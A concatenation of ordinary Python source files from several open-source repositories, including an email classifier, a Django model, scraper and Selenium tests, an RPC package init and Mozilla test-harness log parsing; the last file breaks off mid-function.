    """Fit *estimator* with per-class sample weights.

    Arguments:
        X, y      -- training inputs and binary labels (0/1 numpy arrays).
        estimator -- sklearn Pipeline whose final step is named 'classifier'.
        weights   -- (weight_for_class_0, weight_for_class_1).

    Returns the fitted estimator.

    Fix: the default was a mutable list; an immutable tuple avoids the
    shared-mutable-default pitfall (same values, same indexing behavior).
    """
    sample_weights = (y == 0) * weights[0] + (y == 1) * weights[1]
    estimator.fit(X, y, **{'classifier__sample_weight': sample_weights})
    return estimator
def predict_target(X, name_model, estimator):
    """Predict 0/1 labels using the model-specific decision threshold.

    A sample is class 1 when its class-0 probability falls below the
    stored threshold for *name_model*.
    """
    decision_threshold = threshold_dic[name_model]
    probabilities = estimator.predict_proba(X)
    return (probabilities[:, 0] < decision_threshold).astype(int)
def fit_grid_search(X, y, name_model='mnb', n_splits=3, n_iter=10):
    """Randomized search over class sample-weights and decision threshold.

    Wraps the text pipeline in an adapter estimator whose hyper-parameters
    are the two per-class weights (w_0, w_1) and the probability threshold,
    samples them from normal distributions centred on 0.5, and refits on
    the best combination.  Returns a dict with the refitted pipeline and
    the optimal weights/threshold.
    """
    class weightEst(BaseEstimator):
        # Adapter exposing w_0, w_1 and thres as searchable hyper-parameters
        # around the fixed get_estimator(name_model) pipeline.
        def __init__(self, w_0, w_1, thres):
            self.w_0 = w_0
            self.w_1 = w_1
            self.thres = thres
            self.estimator = get_estimator(name_model)
        def fit(self, X, y):
            # Per-sample weights derived from the class of each sample.
            weight = self.w_0 * (y == 0) + self.w_1 * (y == 1)
            self.estimator.fit(X, y, **{'classifier__sample_weight': weight} )
            return self
        def predict(self, X):
            # Class 1 when the class-0 probability is below the threshold.
            score = self.estimator.predict_proba(X)
            ypred = (score[:, 0] < self.thres).astype(int)
            return ypred
        def predict_proba(self, X):
            score = self.estimator.predict_proba(X)
            return score
        def get_params(self, deep=True):
            params = {'w_0': self.w_0, 'w_1': self.w_1, 'thres': self.thres}
            return params
        def set_params(self, **params):
            self.w_0 = params['w_0']
            self.w_1 = params['w_1']
            self.thres = params['thres']
            return self
    estimator = weightEst(0.5, 0.5, 0.5)
    cv_dev = ShuffleSplit(n_splits=n_splits, test_size=0.3)
    scorer = make_scorer(accuracy_score)
    grid_search = RandomizedSearchCV(estimator,
                                     scoring=scorer,
                                     refit=True,
                                     cv=cv_dev,
                                     n_iter=n_iter,
                                     param_distributions={'w_0': norm(0.5, 0.1), 'w_1': norm(0.5, 0.1),
                                                          'thres': norm(0.5, 0.1)},
                                     verbose=4
                                     )
    grid_search.fit(X, y)
    clf = grid_search.best_estimator_
    print('Best Parameters...')
    print(grid_search.best_params_)
    print('Best Score...')
    print(grid_search.best_score_)
    return {'opt_estimator':clf.estimator,'opt_weight_taak':clf.w_0,'opt_weight_non_taak':clf.w_1,'opt_thres':clf.thres}
########################################################################################################################
# MODEL PROPERTIES #
########################################################################################################################
def get_logProb(estimator, name_model, class_label):
    """Return per-feature log-probabilities (or log importances).

    For 'mnb' the row of feature_log_prob_ matching *class_label*
    ('TAAK' -> row 0, 'NON_TAAK' -> row 1) is returned; for the tree
    models a normalized log of feature_importances_; otherwise None.
    """
    if name_model == 'mnb':
        log_prob = estimator.named_steps['classifier'].feature_log_prob_
        row_for_label = {'TAAK': 0, 'NON_TAAK': 1}
        if class_label in row_for_label:
            return log_prob[row_for_label[class_label], :]
        return None
    if name_model in ('rf', 'etr'):
        importances = estimator.named_steps['classifier'].feature_importances_
        # Small epsilon keeps log() finite for zero-importance features.
        return np.log(1e-10 + importances / np.sum(importances))
    return None
def get_model_properties(estimator, name_model, class_label):
    """Return (log-probs, word->index vocabulary, index->word lookup)."""
    log_probs = get_logProb(estimator, name_model, class_label)
    words_key = estimator.named_steps['vectorizer'].vocabulary_
    key_words = {index: word for word, index in words_key.items()}
    return log_probs, words_key, key_words
########################################################################################################################
# FIGURES #
########################################################################################################################
def add_new_email_images(mail_id, user='Mette'):
    """Generate per-model images and metadata for one e-mail, for *user*.

    For every model in model_dict: loads the pickled pipeline, scores the
    mail, renders a probability pie and a feature-importance image, and
    appends an entry to the user's JSON metadata file (which is rewritten
    at the end).
    """
    # Label names keyed by stringified class index.
    spam_ham_dic = {'0': 'TAAK', '1': 'NON_TAAK'}
    def shorten_word(word, MAX_LEN=35):
        # Truncate long subjects for display.
        if len(word) > MAX_LEN:
            return word[:MAX_LEN] + '...'
        return word
    with open(path_json_info_email_images + "Users/"+user+'/'+ filename_json_info_email_images, 'r') as outfile:
        json_email_data = json.load(outfile)
    print(json_email_data.keys())
    X, target, df = get_mail(path_database, filename_database, mail_id)
    for name_model in model_dict.keys():
        # Pick the first pickled model file in the model's directory.
        for filename in os.listdir(path_models+name_model+'/'):
            if ( filename.split('.')[1]== 'pkl'):
                filename_model = filename
                break
        with open(path_models + name_model+'/'+filename_model, 'rb') as fid:
            estimator = pickle.load(fid)
        log_probs, words_key, key_words = get_model_properties(estimator, name_model, 'TAAK')
        body = X
        date = df['Date']
        _from = df['From']
        subject = df['Subject']
        X_transformed = estimator.named_steps['vectorizer'].transform(body)
        word_list = create_word_list(X_transformed, estimator, name_model, key_words)
        score = estimator.predict_proba(body)
        # Class 1 when class-0 probability is below the model's threshold.
        y_pred = int(score[0][0] < threshold_dic[name_model])
        print(X_transformed.shape)
        html_body = return_html_body(body[0], word_list, y_pred, top_n_words=20)
        # Sanitise the mail id so it is safe to use in file names.
        extra_info = 'email_' + mail_id.replace('.','').replace('>','').replace('<','').replace('/','').replace('\\','')
        create_prob_pie_email(name_model, score[0][0], extra_info , user,threshold_dic[name_model])
        create_feature_importance_email(name_model, word_list, extra_info ,user, top_n_words=5)
        print('here...')
        #print(y)
        email_data = {'pred': spam_ham_dic[str(y_pred)],
                      'truth': spam_ham_dic.get(target,'NONE'),
                      'date': date[0],
                      'from': _from[0],
                      'subject': shorten_word(subject[0]),
                      'html_body': html_body,
                      'eFimp': "/static/Images/Emails/Users/"+user+'/feature_importance_email_NA/' + name_model + '/' + "efeature_imp_" + extra_info + '.png',
                      'epie': "/static/Images/Emails/Users/" +user+'/pie_probability_NA/'+ name_model + '/' + "epie_prob_" + extra_info + '.png'}
        if name_model not in json_email_data.keys():
            json_email_data[name_model] = list([email_data])
        else:
            json_email_data[name_model]+= [email_data]
    print('Remove old file...')
    os.remove(path_json_info_email_images + "Users/"+user+'/'+ filename_json_info_email_images)
    print('Create new file')
    with open( path_json_info_email_images + "Users/"+user+'/'+ filename_json_info_email_images, 'w') as outfile:
        json.dump(json_email_data, outfile)
def clean_dir(pathdir, extra_dir=''):
    '''
    Delete every .txt, .png and .pkl file inside pathdir+extra_dir.

    :param pathdir: directory path ending with a separator
    :param extra_dir: optional sub-directory (also separator-terminated)
    :return: None

    Fix: extension detection now uses os.path.splitext instead of
    filename.split('.')[1], which crashed (IndexError) on files without
    a dot and picked the wrong component for multi-dot names.
    '''
    for filename in os.listdir(pathdir + extra_dir):
        extension = os.path.splitext(filename)[1]
        if extension in ('.txt', '.png', '.pkl'):
            print('Deleting File: ' + str(filename))
            os.remove(pathdir + extra_dir + filename)
def clean_file(pathdir, selectFilename):
    '''
    Delete the file named *selectFilename* from *pathdir* if present.

    :param pathdir: directory path ending with a separator
    :param selectFilename: exact file name to remove
    :return: None
    '''
    for candidate in os.listdir(pathdir):
        if candidate != selectFilename:
            continue
        print('Deleting File: ' + str(candidate))
        os.remove(pathdir + candidate)
if __name__ == '__main__':
    # Ad-hoc entry point: load a fresh train/test split and tune the
    # extra-trees model's weights/threshold with randomized search.
    X_train, X_test, y_train, y_test = get_train_test(path_database, filename_database, test_size=0.3)
    fit_grid_search(X_train,y_train,name_model='etr',n_splits=3,n_iter=10)
|
freieslabor/info-display
|
info_display/screens/announcer/models.py
|
from django.db import models
from django.contrib.auth.models import User
class Announcement(models.Model):
    """A single announcement shown on the info display."""

    # User who posted the announcement; '+' disables the reverse relation.
    author = models.ForeignKey(
        User,
        related_name='+',
        verbose_name='Reporter'
    )
    # Short headline, at most 256 characters.
    title = models.CharField(
        verbose_name='Title',
        max_length=256
    )
    # Set automatically on insert and never editable afterwards.
    created = models.DateTimeField(
        verbose_name='Created',
        auto_now_add=True,
        editable=False
    )
    # Free-form announcement text.
    body = models.TextField(
        verbose_name='body'
    )
|
jwhitlock/kuma
|
kuma/scrape/tests/test_source.py
|
# -*- coding: utf-8 -*-
"""Tests for the Source class."""
from __future__ import unicode_literals
import mock
import pytest
from kuma.scrape.sources import Source
from . import mock_requester, mock_storage
class FakeSource(Source):
    """A Fake source for testing shared Source functionality."""

    # Name of the single positional constructor parameter.
    PARAM_NAME = 'name'

    # option name -> (type keyword, default); one option per supported type.
    OPTIONS = {
        'pressed': ('bool', False),
        'length': ('int', 0),
        'unbounded': ('int_all', 0),
        'flavor': ('text', ''),
    }
def test_init_param():
    """Omitted Source parameters are initialized to defaults."""
    src = FakeSource('param')
    assert src.name == 'param'
    assert src.flavor == ''
    assert src.unbounded == 0
    assert src.pressed is False
    assert src.length == 0
@pytest.mark.parametrize(
    'option,value',
    (('pressed', True),
     ('length', 1),
     ('unbounded', 'all'),
     ('flavor', 'curry'),
     ), ids=('bool', 'int', 'int_all', 'text'))
def test_init_options(option, value):
    """Source parameters are initialized by name."""
    # One case per OPTIONS type: a keyword option is stored as an attribute.
    source = FakeSource('popcorn', **{option: value})
    assert source.name == 'popcorn'
    assert getattr(source, option) == value
def test_init_invalid_option():
    """An invalid parameter name raises an exception."""
    # 'unknown' is not in FakeSource.OPTIONS.
    with pytest.raises(Exception):
        FakeSource('param', unknown=1)
def test_merge_none():
    """An empty merge does not change the Source state."""
    src = FakeSource('merge')
    src.state = src.STATE_PREREQ
    result = src.merge_options()
    assert result == {}
    assert src.state == src.STATE_PREREQ
@pytest.mark.parametrize(
    'option,lesser_value,greater_value',
    (('pressed', False, True),
     ('length', 1, 2),
     ('unbounded', 2, 3),
     ), ids=('bool', 'int', 'int_all'))
def test_merge_less(option, lesser_value, greater_value):
    """A merge to smaller parameters keeps the current values and state."""
    # 'text' is excluded: any non-empty text change counts as an update.
    source = FakeSource('merge', **{option: greater_value})
    source.state = source.STATE_PREREQ
    assert source.merge_options(**{option: lesser_value}) == {}
    assert getattr(source, option) == greater_value
    assert source.state == source.STATE_PREREQ
@pytest.mark.parametrize(
    'option,value',
    (('pressed', True),
     ('length', 2),
     ('unbounded', 1),
     ('flavor', 'country'),
     ), ids=('bool', 'int', 'int_all', 'text'))
def test_merge_same(option, value):
    """A merge with the current values keeps the current state."""
    # Merging identical values is a no-op for every option type.
    source = FakeSource('merge', **{option: value})
    source.state = source.STATE_PREREQ
    assert source.merge_options(**{option: value}) == {}
    assert getattr(source, option) == value
    assert source.state == source.STATE_PREREQ
@pytest.mark.parametrize(
    'option,lesser_value,greater_value',
    (('pressed', False, True),
     ('length', 1, 2),
     ('unbounded', 2, 3),
     ), ids=('bool', 'int', 'int_all'))
def test_merge_upgrade(option, lesser_value, greater_value):
    """An updating merge updates the values and resets the state."""
    # An upgrade resets state to STATE_INIT so the source is re-gathered.
    source = FakeSource('merge', **{option: lesser_value})
    source.state = source.STATE_PREREQ
    result = source.merge_options(**{option: greater_value})
    assert result == {option: greater_value}
    assert getattr(source, option) == greater_value
    assert source.state == source.STATE_INIT
def test_merge_more_multiple():
    """Multiple parameters can be updated in one merge call."""
    src = FakeSource('merge')
    result = src.merge_options(
        flavor='salty', unbounded=1, pressed=True, length=1)
    expected = {
        'length': 1, 'pressed': True, 'unbounded': 1, 'flavor': 'salty'}
    assert result == expected
def test_merge_int_all():
    """For the 'int_all' parameter type, 'all' is a valid and maximum value."""
    src = FakeSource('merge')
    first = src.merge_options(unbounded='all')
    second = src.merge_options(unbounded='all')
    assert first == {'unbounded': 'all'}
    assert second == {}
def test_merge_text():
    """For the 'text' parameter type, any non-empty change is an update."""
    src = FakeSource('merge')
    # Each distinct non-empty value is reported as a change ...
    assert src.merge_options(flavor='sweet') == {'flavor': 'sweet'}
    assert src.merge_options(flavor='sour') == {'flavor': 'sour'}
    # ... repeating the current value is not ...
    assert src.merge_options(flavor='sour') == {}
    assert src.merge_options(flavor='sweet') == {'flavor': 'sweet'}
    # ... and the empty string never counts as an update.
    assert src.merge_options(flavor='') == {}
def test_current_options_default():
    """current_options returns empty dict for default options."""
    assert FakeSource('default').current_options() == {}
@pytest.mark.parametrize(
    'option,value',
    (('pressed', True),
     ('length', 1),
     ('unbounded', 'all'),
     ('flavor', 'curry'),
     ), ids=('bool', 'int', 'int_all', 'text'))
def test_current_options_nondefault(option, value):
    """current_options returns the non-default options as a dict."""
    # Only the option that differs from its default appears in the dict.
    source = FakeSource('default', **{option: value})
    assert source.current_options() == {option: value}
@pytest.mark.parametrize(
    'option_type,option,bad_value',
    (('bool', 'pressed', 1),
     ('int', 'length', '0'),
     ('int_all', 'unbounded', '1'),
     ('text', 'flavor', 1),
     ), ids=('bool', 'int', 'int_all', 'text'))
def test_invalid_values(option_type, option, bad_value):
    """Invalid parameter values raise a ValueError."""
    # The error message is expected to mention the option's type keyword.
    with pytest.raises(ValueError) as err:
        FakeSource('fails', **{option: bad_value})
    assert option_type in str(err.value)
@pytest.mark.parametrize(
    "href,decoded", [
        (b'binary', u'binary'),
        (b'%E7%A7%BB%E8%A1%8C%E4%BA%88%E5%AE%9A', u'移行予定'),
        (u'Slug#Anchor_\u2014_With_Dash', u'Slug#Anchor_\u2014_With_Dash'),
    ])
def test_decode_href(href, decoded):
    """Source.decode_href() turns URL-encoded hrefs into unicode strings."""
    # Covers plain bytes, percent-encoded UTF-8 bytes, and already-unicode input.
    source = FakeSource('conversions')
    assert decoded == source.decode_href(href)
def test_source_error_str():
    """The Source.Error exception can be turned into a string."""
    plain = Source.SourceError('A simple error')
    assert "%s" % plain == 'A simple error'
    formatted = Source.SourceError(
        'A formatted error, like "%s" and %d.', "a string", 123)
    assert "%s" % formatted == 'A formatted error, like "a string" and 123.'
def test_gather_done_is_done():
    """A source that is done can still be gathered."""
    src = FakeSource('existing')
    src.state = src.STATE_DONE
    result = src.gather(mock_requester(), mock_storage())
    assert result == []
    assert src.freshness == src.FRESH_UNKNOWN
    assert src.state == src.STATE_DONE
def test_gather_load_storage_existing():
    """A source that is already in storage loads quickly."""
    src = FakeSource('existing')
    src.load_and_validate_existing = mock.Mock(
        return_value=(True, ['next']))
    result = src.gather(mock_requester(), mock_storage())
    assert result == ['next']
    assert src.freshness == src.FRESH_NO
    assert src.state == src.STATE_DONE
def test_gather_load_storage_error():
    """A source can raise an error when loading from storage."""
    src = FakeSource('existing')
    src.load_and_validate_existing = mock.Mock(
        side_effect=src.SourceError('Storage complained.'))
    result = src.gather(mock_requester(), mock_storage())
    assert result == []
    assert src.freshness == src.FRESH_UNKNOWN
    assert src.state == src.STATE_ERROR
def test_gather_load_prereqs_more_needed():
    """A source can request other sources as prerequisites."""
    src = FakeSource('needs_prereqs')
    prereq_data = {'needs': ['bonus']}
    src.load_prereqs = mock.Mock(return_value=(False, prereq_data))
    result = src.gather(mock_requester(), mock_storage())
    assert result == ['bonus']
    assert src.freshness == src.FRESH_UNKNOWN
    assert src.state == src.STATE_PREREQ
def test_gather_load_prereqs_error():
    """A source may raise an error when loading prerequisites."""
    src = FakeSource('bad_prereqs')
    src.load_prereqs = mock.Mock(side_effect=src.SourceError('bad'))
    result = src.gather(mock_requester(), mock_storage())
    assert result == []
    assert src.freshness == src.FRESH_UNKNOWN
    assert src.state == src.STATE_ERROR
def test_gather_save_data_error():
    """A source can fail when saving the data."""
    src = FakeSource('needs_prereqs')
    src.load_prereqs = mock.Mock(return_value=(True, {}))
    src.save_data = mock.Mock(side_effect=src.SourceError('failed'))
    result = src.gather(mock_requester(), mock_storage())
    assert result == []
    # The fetch itself succeeded, so freshness is YES despite the error.
    assert src.freshness == src.FRESH_YES
    assert src.state == src.STATE_ERROR
def test_gather_success_with_more_sources():
    """A source with all prereqs can request further sources."""
    src = FakeSource('needs_prereqs')
    src.load_prereqs = mock.Mock(return_value=(True, {}))
    src.save_data = mock.Mock(return_value=['bonus'])
    result = src.gather(mock_requester(), mock_storage())
    assert result == ['bonus']
    assert src.freshness == src.FRESH_YES
    assert src.state == src.STATE_DONE
|
seprich/py-bson-rpc
|
bsonrpc/__init__.py
|
# -*- coding: utf-8 -*-
'''
Library for JSON RPC 2.0 and BSON RPC
'''
from bsonrpc.exceptions import BsonRpcError
from bsonrpc.framing import (
JSONFramingNetstring, JSONFramingNone, JSONFramingRFC7464)
from bsonrpc.interfaces import (
notification, request, rpc_notification, rpc_request, service_class)
from bsonrpc.options import NoArgumentsPresentation, ThreadingModel
from bsonrpc.rpc import BSONRpc, JSONRpc
from bsonrpc.util import BatchBuilder
# Package version and license URL, exposed for consumers and packaging tools.
__version__ = '0.2.1'
__license__ = 'http://mozilla.org/MPL/2.0/'
# Public API of the bsonrpc package (kept alphabetical).
__all__ = [
    'BSONRpc',
    'BatchBuilder',
    'BsonRpcError',
    'JSONFramingNetstring',
    'JSONFramingNone',
    'JSONFramingRFC7464',
    'JSONRpc',
    'NoArgumentsPresentation',
    'ThreadingModel',
    'notification',
    'request',
    'rpc_notification',
    'rpc_request',
    'service_class',
]
|
ericawright/bedrock
|
tests/functional/firefox/new/test_download.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import pytest
from pages.firefox.new.download import DownloadPage
# ?v=a param added temporarily to evade a traffic cop experiment
# See https://github.com/mozilla/bedrock/issues/9019
@pytest.mark.sanity
@pytest.mark.nondestructive
def test_download_button_displayed(base_url, selenium):
    """The main download button is visible on the download page."""
    download_page = DownloadPage(selenium, base_url, params='?v=a').open()
    assert download_page.download_button.is_displayed
# Firefox and Internet Explorer don't cope well with file prompts whilst using Selenium.
@pytest.mark.skip_if_firefox(reason='http://saucelabs.com/jobs/5a8a62a7620f489d92d6193fa67cf66b')
@pytest.mark.skip_if_internet_explorer(reason='https://github.com/SeleniumHQ/selenium/issues/448')
@pytest.mark.nondestructive
def test_click_download_button(base_url, selenium):
    """Clicking the download button lands on the thank-you page."""
    download_page = DownloadPage(selenium, base_url, params='?v=a').open()
    thank_you = download_page.download_firefox()
    assert thank_you.seed_url in selenium.current_url
@pytest.mark.nondestructive
def test_other_platforms_modal(base_url, selenium):
    """The 'other platforms' modal opens and then closes cleanly."""
    download_page = DownloadPage(selenium, base_url, params='?v=a').open()
    platforms_modal = download_page.open_other_platforms_modal()
    assert platforms_modal.is_displayed
    platforms_modal.close()
@pytest.mark.nondestructive
@pytest.mark.skip_if_not_firefox(reason='Join Firefox form is only displayed to Firefox users')
def test_firefox_account_modal(base_url, selenium):
    """The Join Firefox modal opens and then closes cleanly."""
    download_page = DownloadPage(selenium, base_url, params='?v=a').open()
    account_modal = download_page.open_join_firefox_modal()
    assert account_modal.is_displayed
    account_modal.close()
|
willkg/socorro-collector
|
collector/app/for_application_defaults.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""This is an extension to configman for Socorro. It creates a ValueSource
object that is also a 'from_string_converter'. It is tailored to work with
the Socorro 'application' configuration parameter. Once configman has made
a final determination as to which application to actually run, this class
allows Configman to go to that application and fetch its preferred defaults
for the rest of options required by that application."""
from configman.converters import str_to_python_object
from configman.dotdict import DotDict
#==============================================================================
class ApplicationDefaultsProxy(object):
    """Placeholder that induces configman to query the selected application
    for its preferred defaults."""

    def __init__(self):
        self.application_defaults = DotDict()
        self.apps = self.find_all_the_apps()

    def str_to_application_class(self, an_app_key):
        """a configman compatible str_to_* converter"""
        # Known short names map to dotted paths; anything else is assumed
        # to already be a dotted path to the application class.
        try:
            dotted_path = self.apps[an_app_key]
            app_class = str_to_python_object(dotted_path)
        except KeyError:
            app_class = str_to_python_object(an_app_key)
        try:
            self.application_defaults = DotDict(
                app_class.get_application_defaults()
            )
        except AttributeError:
            # The app exposes no get_application_defaults - nothing to record.
            pass
        return app_class

    @staticmethod
    def find_all_the_apps():
        """in the future, re-implement this as an automatic discovery service
        """
        return {
            'collector': 'collector.collector_app.CollectorApp',
            'collector2015': 'collector.collector_app.Collector2015App',
            'crashmover': 'collector.crashmover_app.CrashMoverApp',
            'fetch': 'collector.external.fetch_app.FetchApp',
            'copy_processed': 'collector.collector.crashmover_app.ProcessedCrashCopierApp',
            'copy_raw_and_processed': 'collector.collector.crashmover_app.RawAndProcessedCopierApp',
            'reprocess_crashlist': 'collector.external.rabbitmq.reprocess_crashlist.ReprocessCrashlistApp',
            'purge_rmq': 'collector.external.rabbitmq.purge_queue_app.PurgeRabbitMQQueueApp',
        }
# configman value-source protocol: declares what source objects this module's
# ValueSource can wrap.
# NOTE(review): these parentheses do NOT create a tuple -- can_handle is bound
# to the class object itself, not (ApplicationDefaultsProxy,).  Confirm against
# configman's value-source dispatch whether a one-element tuple was intended.
can_handle = (
    ApplicationDefaultsProxy
)
#==============================================================================
class ValueSource(object):
    """Value source / from-string converter hybrid.

    As a value source it serves whatever defaults the associated
    ApplicationDefaultsProxy has captured so far (an empty DotDict until an
    application has been resolved).  Because the proxy records the chosen
    app's preferred defaults during string conversion, those defaults become
    visible through 'get_values' even though the app itself was loaded
    through Configman.
    """

    def __init__(self, source, the_config_manager=None):
        # 'source' is expected to be an ApplicationDefaultsProxy instance
        self.source = source

    def get_values(self, config_manager, ignore_mismatches, obj_hook=DotDict):
        """Return the captured application defaults as an 'obj_hook' mapping."""
        defaults = self.source.application_defaults
        if isinstance(defaults, obj_hook):
            return defaults
        return obj_hook(defaults)
|
cstipkovic/spidermonkey-research
|
testing/mozharness/mozharness/mozilla/testing/unittest.py
|
#!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# ***** END LICENSE BLOCK *****
import os
import re
from mozharness.mozilla.testing.errors import TinderBoxPrintRe
from mozharness.base.log import OutputParser, WARNING, INFO, CRITICAL, ERROR
from mozharness.mozilla.buildbot import TBPL_WARNING, TBPL_FAILURE, TBPL_RETRY
from mozharness.mozilla.buildbot import TBPL_SUCCESS, TBPL_WORST_LEVEL_TUPLE
# test-suite categories this module knows how to summarize for TinderboxPrint
SUITE_CATEGORIES = ['mochitest', 'reftest', 'xpcshell']
def tbox_print_summary(pass_count, fail_count, known_fail_count=None,
                       crashed=False, leaked=False):
    """Build the TinderboxPrint HTML summary fragment for a test run.

    Returns "pass/fail[/known_fail]" with the fail count wrapped in a
    highlighted <em> when non-zero, or a highlighted "T-FAIL" when any count
    is negative (no summary parsed) or nothing ran at all.  CRASH and
    LEAK/L-FAIL markers are appended when applicable; leaked=None means the
    leak log line was missing (L-FAIL).
    """
    fail_markup = '<em class="testfail">%s</em>'
    saw_negative_count = (pass_count < 0 or fail_count < 0 or
                          (known_fail_count is not None and known_fail_count < 0))
    nothing_ran = (pass_count == 0 and fail_count == 0 and
                   (known_fail_count == 0 or known_fail_count is None))
    if saw_negative_count or nothing_ran:
        summary = fail_markup % 'T-FAIL'
    else:
        fail_text = str(fail_count)
        if fail_count > 0:
            fail_text = fail_markup % fail_text
        summary = "%d/%s" % (pass_count, fail_text)
        if known_fail_count is not None:
            summary += "/%d" % known_fail_count
    # crash / leak markers are appended even to a T-FAIL summary
    if crashed:
        summary += " %s" % (fail_markup % "CRASH")
    if leaked is not False:
        summary += " %s" % (fail_markup % ((leaked and "LEAK") or "L-FAIL"))
    return summary
class TestSummaryOutputParserHelper(OutputParser):
    """Accumulates passed/failed/todo counts from 'passed: N'-style log lines
    and derives a TBPL status from them."""
    def __init__(self, regex=re.compile(r'(passed|failed|todo): (\d+)'), **kwargs):
        # regex group(1) names the attribute to set; group(2) is the count
        self.regex = regex
        self.failed = 0
        self.passed = 0
        self.todo = 0
        self.last_line = None
        self.tbpl_status = TBPL_SUCCESS
        self.worst_log_level = INFO
        super(TestSummaryOutputParserHelper, self).__init__(**kwargs)
    def parse_single_line(self, line):
        """Parse one log line, updating the matching counter if it is a
        summary line."""
        super(TestSummaryOutputParserHelper, self).parse_single_line(line)
        self.last_line = line
        m = self.regex.search(line)
        if m:
            try:
                # e.g. sets self.passed = 12 for "passed: 12"
                setattr(self, m.group(1), int(m.group(2)))
            except ValueError:
                # ignore bad values
                pass
    def evaluate_parser(self, return_code, success_codes=None):
        """Map (return_code, counters) to a (tbpl_status, log_level) pair.
        # NOTE(review): return_code 10 is treated as 'tests failed' -- this
        # convention comes from the harness; confirm before reusing elsewhere.
        """
        if return_code == 0 and self.passed > 0 and self.failed == 0:
            self.tbpl_status = TBPL_SUCCESS
        elif return_code == 10 and self.failed > 0:
            self.tbpl_status = TBPL_WARNING
        else:
            self.tbpl_status = TBPL_FAILURE
            self.worst_log_level = ERROR
        return (self.tbpl_status, self.worst_log_level)
    def print_summary(self, suite_name):
        """Emit the TinderboxPrint summary line ("pass/fail/todo") for TBPL."""
        # generate the TinderboxPrint line for TBPL
        emphasize_fail_text = '<em class="testfail">%s</em>'
        failed = "0"
        if self.passed == 0 and self.failed == 0:
            # nothing ran at all -> highlighted T-FAIL
            self.tsummary = emphasize_fail_text % "T-FAIL"
        else:
            if self.failed > 0:
                failed = emphasize_fail_text % str(self.failed)
            self.tsummary = "%d/%s/%d" % (self.passed, failed, self.todo)
        self.info("TinderboxPrint: %s<br/>%s\n" % (suite_name, self.tsummary))
    def append_tinderboxprint_line(self, suite_name):
        # thin alias kept for interface parity with DesktopUnittestOutputParser
        self.print_summary(suite_name)
class DesktopUnittestOutputParser(OutputParser):
    """
    A class that extends OutputParser such that it can parse the number of
    passed/failed/todo tests from the output.

    Counters start at -1 meaning "no summary line seen yet"; harness error,
    crash, leak, and retry lines are tracked separately and folded into the
    final TBPL status by evaluate_parser().
    """
    def __init__(self, suite_category, **kwargs):
        # worst_log_level defined already in DesktopUnittestOutputParser
        # but is here to make pylint happy
        self.worst_log_level = INFO
        super(DesktopUnittestOutputParser, self).__init__(**kwargs)
        # summary regex for this suite; empty dict when none is registered
        self.summary_suite_re = TinderBoxPrintRe.get('%s_summary' % suite_category, {})
        self.harness_error_re = TinderBoxPrintRe['harness_error']['minimum_regex']
        self.full_harness_error_re = TinderBoxPrintRe['harness_error']['full_regex']
        self.harness_retry_re = TinderBoxPrintRe['harness_error']['retry_regex']
        # -1 == "no summary line found"; distinguished from a real 0
        self.fail_count = -1
        self.pass_count = -1
        # known_fail_count does not exist for some suites
        self.known_fail_count = self.summary_suite_re.get('known_fail_group') and -1
        self.crashed, self.leaked = False, False
        self.tbpl_status = TBPL_SUCCESS
    def parse_single_line(self, line):
        """Classify one log line: suite summary, harness error, retry,
        or ordinary output (delegated to the base parser)."""
        if self.summary_suite_re:
            summary_m = self.summary_suite_re['regex'].match(line)  # pass/fail/todo
            if summary_m:
                message = ' %s' % line
                log_level = INFO
                # remove all the none values in groups() so this will work
                # with all suites including mochitest browser-chrome
                summary_match_list = [group for group in summary_m.groups()
                                      if group is not None]
                r = summary_match_list[0]
                if self.summary_suite_re['pass_group'] in r:
                    if len(summary_match_list) > 1:
                        self.pass_count = int(summary_match_list[-1])
                    else:
                        # This handles suites that either pass or report
                        # number of failures. We need to set both
                        # pass and fail count in the pass case.
                        self.pass_count = 1
                        self.fail_count = 0
                elif self.summary_suite_re['fail_group'] in r:
                    self.fail_count = int(summary_match_list[-1])
                    if self.fail_count > 0:
                        message += '\n One or more unittests failed.'
                        log_level = WARNING
                # If self.summary_suite_re['known_fail_group'] == None,
                # then r should not match it, # so this test is fine as is.
                elif self.summary_suite_re['known_fail_group'] in r:
                    self.known_fail_count = int(summary_match_list[-1])
                self.log(message, log_level)
                return  # skip harness check and base parse_single_line
        harness_match = self.harness_error_re.match(line)
        if harness_match:
            # any harness error downgrades the run to at least WARNING
            self.warning(' %s' % line)
            self.worst_log_level = self.worst_level(WARNING, self.worst_log_level)
            self.tbpl_status = self.worst_level(TBPL_WARNING, self.tbpl_status,
                                                levels=TBPL_WORST_LEVEL_TUPLE)
            full_harness_match = self.full_harness_error_re.match(line)
            if full_harness_match:
                r = full_harness_match.group(1)
                if r == "application crashed":
                    self.crashed = True
                elif r == "missing output line for total leaks!":
                    # None encodes "leak status unknown" (L-FAIL in summary)
                    self.leaked = None
                else:
                    self.leaked = True
            return  # skip base parse_single_line
        if self.harness_retry_re.search(line):
            self.critical(' %s' % line)
            self.worst_log_level = self.worst_level(CRITICAL, self.worst_log_level)
            self.tbpl_status = self.worst_level(TBPL_RETRY, self.tbpl_status,
                                                levels=TBPL_WORST_LEVEL_TUPLE)
            return  # skip base parse_single_line
        super(DesktopUnittestOutputParser, self).parse_single_line(line)
    def evaluate_parser(self, return_code, success_codes=None):
        """Fold counters, script errors, and the process return code into the
        final (tbpl_status, worst_log_level) pair."""
        success_codes = success_codes or [0]
        if self.num_errors:  # mozharness ran into a script error
            self.tbpl_status = self.worst_level(TBPL_FAILURE, self.tbpl_status,
                                                levels=TBPL_WORST_LEVEL_TUPLE)
        # I have to put this outside of parse_single_line because this checks not
        # only if fail_count was more then 0 but also if fail_count is still -1
        # (no fail summary line was found)
        if self.fail_count != 0:
            self.worst_log_level = self.worst_level(WARNING, self.worst_log_level)
            self.tbpl_status = self.worst_level(TBPL_WARNING, self.tbpl_status,
                                                levels=TBPL_WORST_LEVEL_TUPLE)
        # Account for the possibility that no test summary was output.
        if self.pass_count <= 0 and self.fail_count <= 0 and \
           (self.known_fail_count is None or self.known_fail_count <= 0):
            self.error('No tests run or test summary not found')
            self.worst_log_level = self.worst_level(WARNING,
